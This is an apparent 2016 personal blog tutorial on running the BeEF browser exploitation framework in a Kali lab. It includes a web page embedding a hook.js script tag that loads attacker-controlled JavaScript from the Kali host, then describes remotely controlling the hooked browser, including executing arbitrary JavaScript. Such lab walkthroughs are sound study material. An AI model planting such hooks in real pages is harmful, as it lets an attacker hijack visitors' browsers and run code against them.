Friday, April 1, 2016

Kali Tool Series - BeEF

“BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.”

How It Works

Basically, first start the BeEF server, then let the victim run hook.js on his/her browser, and we can know information of victims’ machines or control them.

Start BeEF Server

> beef-xss 
[*] Please wait as BeEF services are started.
[*] You might need to refresh your browser once it opens.
[*] UI URL: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>
… 
Then, open the browser with URL http://127.0.0.1:3000/ui/panel on Kali, and you’ll see the BeEF Control Panel.

Let Victim Run hook.js

I’m not including the strategies of letting people to run hook.js in real world, which I believe some social engineering is involved. Instead, I am running a simple server on Kali using another port other than 3000 (used by BeEF Server), then let the victim open the webpage which has hook.js embedded.

Setup the Web Page
Usually, some frauding may be involved here, but I am ignoring them for study purpose. What I built now is barely a blank page with label “hello”. Save following page as index.html somewhere on Kali.
<!DOCTYPE html>
<html>
<head>
</head>
<body>
    <h1>hello</h1>
    <script src="http://192.168.63.155:3000/hook.js"></script>
</body>
</html>
192.168.63.155 is the IP of Kali, which is a local IP, so only other machines under the same local network can access later on.

Setup the Web Server
I am using Python Simple HTTP Server, so:
> python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
And, the web server will start and be listening to port 8000.

Victim Visit
As Kali is running in a VM, I visit the site just set on my host machine (Mac). Simply opening http://192.168.63.155:8000 will work.

Control the Victim

On Kali, you can see a new item popped up on the lefthand list. You can start to read the victim’s information or control it.

What You Can Do

On the command tab in the BeEF Control Panel, you can see a list of action you can do to the victim. Well, in my experiment, quite a lot of them don’t work, possibly because the browsers had fixed the security flaw, or just because the BeEF code wasn’t update to date.
On BeEF Cantrol Panel, different color circle next to the actions represent different status:
  • green : works on the target; invisible.
  • orange : works on the target; visible.
  • grey : must yet be verified if it works.
  • red : does not work on the target.
Here, I will list some actions I found working.

Play Sound

This command is to play a sound on the target machine by giving the sound URL. I randomly searched on www.findsounds.com, and got this link:
http://princezze.free.fr/sounds/laugh.MP3
Put it onto the panel, then it works.


iFrame Event Logger

This one allows the attacker to open website by providing the URL. It won’t work on the sites that check its origin. That is, if you try to open Google.com, then you will get following error in the victim’s browser console.
[Error] Refused to display 'https://www.google.com/?gws_rd=ssl' in a frame because it set 'X-Frame-Options' to 'SAMEORIGIN'.
But, it’s fine if you open other simple websites like http://www.heron.me/.



Excute JavaScript Code

This is the point. As the attack was trigger by the user when he/she runs hook.js, all the further actions are done by passing JavaScripts code from the attackers to the victim. So, “excuting JavaScript code” on the attacker’s demand will bring the maximun flexiblilty.




Other

Some commands don’t show the result on the control panel, or they are showed in somewhere I couldn’t find. So, I switched to my favorite Terminal, and found the results.
They are saved in a sqlite .db file, by using the sqlite tool, we can access the result:
> cd /var/lib/beef-xss
> sqlitebrowser beef.db
Check the core_results table for the results.


Reference